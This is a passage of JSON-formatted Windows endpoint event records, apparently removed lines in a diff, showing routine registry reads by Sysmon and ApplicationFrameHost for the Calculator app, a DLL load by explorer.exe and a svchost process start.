"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "CapabilityAccessManagerClient.dll", - "image_path": "C:\\Windows\\System32\\CapabilityAccessManagerClient.dll", - "pid": 4744, - "process_name": "explorer.exe", - "process_path": "C:\\Windows\\explorer.exe", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k appmodel -p -s camsvc", - "event_type": "process", - "logon_id": 999, - "parent_process_name": "services.exe", - "parent_process_path": "C:\\Windows\\System32\\services.exe", - "pid": 4052, - "ppid": 568, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "subtype": "create", - "timestamp": 131883573250320000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}", - "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "image_load", - "image_name": "svchost.exe", - "image_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250259984, - 